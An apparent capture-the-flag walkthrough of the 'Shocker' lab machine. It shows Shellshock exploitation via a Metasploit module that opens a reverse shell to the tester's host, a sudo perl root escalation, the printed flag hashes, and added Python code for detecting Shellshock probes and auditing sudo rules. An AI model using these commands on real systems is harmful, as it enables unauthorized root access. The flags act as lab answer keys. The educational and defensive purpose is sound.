- Service Enumeration
- Further Enumeration
- Exploit discovery
- Meterpreter
- Privesc
Nmap
Nmap reveals port 80 open, running Apache httpd 2.4.18, and OpenSSH 7.2p2 on the non-standard port 2222.
nmap -sC -sV -p-65535 --script vuln 10.10.10.56
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
..[snipped bunch of false-positives]..
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
..[snipped bunch of false-positives]..
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 379.45 seconds
Go to the WebApp:
The application does not reveal much.

Page source:
y>
<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">
</body>
</html>
Dirbuster:
The next logical step is to brute-force directories and files in order to find hidden content. While using DirBuster I've found a cgi-bin folder and looked for sensitive files such as php, sh, txt and pdf.

Shellshock
What is Shellshock? Check this well-done document on the topic: OWASP SHELLSHOCK
Finding and Exploiting Shellshock
msf6 > search shellshock
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
The following is the output of scanning the target URI (http://10.10.10.56/cgi-bin/user.sh) with the msf module shown below:
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit
[+] uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Searching for suitable shellshock exploit:
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > search shellshock
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
1 auxiliary/server/dhclient_bash_env 2014-09-24 normal No DHCP Client Bash Environment Variable Code Injection (Shellshock)
2 exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock)
3 exploit/linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock)
4 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
5 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
6 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)
7 exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution
8 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
9 exploit/osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
10 exploit/unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock)
11 exploit/unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock)
Interact with a module by name or index. For example info 11, use 11 or use exploit/unix/smtp/qmail_bash_env_exec
Using the show info command, I have found a suitable exploit for our case:
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show info 5
Name: Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
Module: exploit/multi/http/apache_mod_cgi_bash_env_exec
Platform:
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2014-09-24
Provided by:
Stephane Chazelas
wvu <[email protected]>
juan vazquez <[email protected]>
lcamtuf
Available targets:
Id Name
-- ----
0 Linux x86
1 Linux x86_64
*(removed some info)*
Payload information:
Space: 2048
Description:
This module exploits the Shellshock vulnerability, a flaw in how the
Bash shell handles external environment variables. This module
targets CGI scripts in the Apache web server by setting the
HTTP_USER_AGENT environment variable to a malicious function
definition.
References:
https://cvedetails.com/cve/CVE-2014-6271/
https://cvedetails.com/cve/CVE-2014-6278/
https://cwe.mitre.org/data/definitions/94.html
OSVDB (112004)
https://www.exploit-db.com/exploits/34765
https://access.redhat.com/articles/1200223
https://seclists.org/oss-sec/2014/q3/649
Also known as:
Shellshock
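The module description above says the exploit rides on a crafted HTTP_USER_AGENT, because mod_cgi exports request headers into the environment of the CGI script and a vulnerable bash imports any value starting with `() {` as a function definition. From the defender's side the same marker is visible in the web server's access log, since the Apache combined format records the User-Agent and Referer. The following is an added example, not code from this writeup or from Metasploit, that flags the Shellshock marker in constructed Apache combined-format log lines (the sample lines, hosts and timestamps are made up for the example):

```python
"""Flag Shellshock (CVE-2014-6271) probes in Apache access logs.

Added example for this writeup; not part of the original post or of any
tool it uses. The sample log lines below are constructed.
"""
import re
from dataclasses import dataclass

# Apache "combined" format:
#   host ident user [time] "request" status size "referer" "user-agent"
# The quoted-field patterns assume no escaped quotes inside a field, which
# holds for the sample lines (Apache writes \" for embedded quotes).
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Vulnerable bash imported any environment value starting with "() {" as a
# function definition and kept parsing past the closing brace, executing
# whatever followed. The match here is deliberately broad (optional
# whitespace) so that sloppy probes are flagged as well.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Header fields that mod_cgi exports to the environment and that the
# combined log happens to record. Other headers (Cookie, custom ones) are
# vectors too but do not appear in this log format.
LOGGED_HEADER_FIELDS = ("agent", "referer")


@dataclass
class Hit:
    host: str
    time: str
    request: str
    field: str        # which logged field carried the marker
    value: str        # the raw field value, for the analyst
    cgi_target: bool  # request path under /cgi-bin/ => likely reached bash


def parse_line(line: str):
    """Return the combined-log fields as a dict, or None if the line does not parse."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def find_shellshock(lines):
    """Scan log lines and return one Hit per logged field containing the marker."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        # request looks like "GET /cgi-bin/user.sh HTTP/1.1"
        parts = rec["request"].split()
        path = parts[1] if len(parts) > 1 else ""
        for field in LOGGED_HEADER_FIELDS:
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append(Hit(rec["host"], rec["time"], rec["request"],
                                field, rec[field], path.startswith("/cgi-bin/")))
    return hits


def hosts_by_hit_count(hits):
    """Aggregate hits per source host, most active first."""
    counts = {}
    for h in hits:
        counts[h.host] = counts.get(h.host, 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


# Constructed sample log: a probe against the CGI script, a benign request,
# and a probe carried in the Referer against a non-CGI path.
SAMPLE_LOG = [
    '10.10.14.4 - - [07/Apr/2021:10:01:55 -0400] "GET /cgi-bin/user.sh HTTP/1.1" '
    '200 118 "-" "() { :;}; echo; echo shellshock-probe"',
    '10.10.14.4 - - [07/Apr/2021:10:02:11 -0400] "GET /cgi-bin/user.sh HTTP/1.1" '
    '200 118 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.7 - - [07/Apr/2021:10:03:40 -0400] "GET /index.html HTTP/1.1" '
    '200 137 "() { :; }; /bin/echo probe" "curl/7.68.0"',
]

if __name__ == "__main__":
    found = find_shellshock(SAMPLE_LOG)
    for hit in found:
        print(f"{hit.time} {hit.host} {hit.field}={hit.value!r} "
              f"request={hit.request!r} cgi={hit.cgi_target}")
    print(hosts_by_hit_count(found))
```

The combined format records only two header fields, so payloads carried in Cookie or a custom header need a LogFormat that includes them, or inspection at the network layer. The `() {` match will also flag harmless scanners; the `cgi_target` flag helps triage the hits that actually reached a script bash could have run. Detection only tells you who tried; the fix is the patched bash described in the Red Hat article referenced above.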
Next, I select the exploit, set the required options and run it, resulting in a meterpreter session.
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI http://10.10.10.56/cgi-bin/user.sh
TARGETURI => http://10.10.10.56/cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.4:1234
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (980808 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.14.4:1234 -> 10.10.10.56:57692) at 2021-04-07 10:02:11 -0400
In the following section I check which user I am logged in as, move to that user's home directory and list its files, finding the user flag. In this case I was lucky to check the sudo configuration for misconfigurations as the very first thing. Finally, we can privesc with perl.
meterpreter > shell
Process 1530 created.
Channel 1 created.
ls
user.sh
whoami
shelly
cd
ls
user.txt
cat user.txt
3b52250728977779d192b0262d2c2d7e
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
sudo perl -e 'exec "/bin/bash"'
whoami
root
cd /root/
ls
root.txt
cat root.txt
f77dc0ce91af01ad16326409e1d05b68
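The sudo rule that gave root here, (root) NOPASSWD: /usr/bin/perl, is a textbook finding: an interpreter or shell allowed through sudo without argument restrictions is equivalent to granting a root shell, and NOPASSWD removes the last friction. As an added example (not part of the original writeup), the following Python audits sudo -l output for such rules. The sample input reuses the rule shown above plus two constructed rules for contrast; the list of shell-equivalent programs is a constructed starting point, not an exhaustive one.

```python
"""Audit `sudo -l` output for rules that hand out a shell as another user.

Added example for this writeup; not part of the original post. The rule
list combines the entry shown on this page with constructed extra rules.
"""
import os
import re

# Programs that run arbitrary commands once they are allowed through sudo
# without argument restrictions. Constructed starting list; extend it.
SHELL_EQUIVALENT = {
    "perl", "python", "python2", "python3", "ruby", "php", "node", "lua",
    "bash", "sh", "dash", "zsh", "ksh", "env", "find", "awk", "vim", "vi",
    "less", "more",
}

# A rule line looks like "(runas) TAG: TAG: command, command"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudo_l(output: str):
    """Return one dict per command found after 'User X may run the following commands'."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        # "(root)" or "(ALL : ALL)": keep the run-as user part only
        runas = m.group("runas").split(":")[0].strip()
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": runas, "tags": tags, "command": cmd.strip()})
    return rules


def assess(rule):
    """Classify one rule; returns it with program/nopasswd/severity/reason added."""
    parts = rule["command"].split()
    prog = os.path.basename(parts[0])
    args = parts[1:]
    nopasswd = "NOPASSWD" in rule["tags"]
    if rule["command"] == "ALL":
        sev, why = "critical", "unrestricted sudo"
    elif prog in SHELL_EQUIVALENT and not args:
        sev, why = "high", f"{prog} executes arbitrary commands as {rule['runas']}"
    elif prog in SHELL_EQUIVALENT and "SETENV" in rule["tags"]:
        # SETENV lets the caller pass environment variables that the
        # interpreter honours (module search paths and the like).
        sev, why = "medium", f"SETENV lets the caller inject environment into {prog}"
    else:
        sev, why = "info", "argument-restricted command; review manually"
    if nopasswd and sev != "info":
        why += ", without a password"
    return {**rule, "program": prog, "nopasswd": nopasswd,
            "severity": sev, "reason": why}


def audit_sudo_l(output: str):
    """Parse and classify every rule in the given `sudo -l` output."""
    return [assess(r) for r in parse_sudo_l(output)]


# First rule is the one from this box; the other two are constructed.
SAMPLE_SUDO_L = r"""Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/apt-get update
    (ALL : ALL) NOPASSWD: SETENV: /usr/bin/python3 /opt/backup.py
"""

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"[{f['severity']:8}] ({f['runas']}) {f['command']}: {f['reason']}")
```

The classifier is intentionally conservative: it only rates a rule "high" when the program is a known shell equivalent and is allowed with no arguments at all, and leaves argument-restricted commands as "info" for a human to review, since whether a fixed argument list is safe depends on the program. Running this against the output of every account's sudo -l during a build review catches the exact misconfiguration that ended this box.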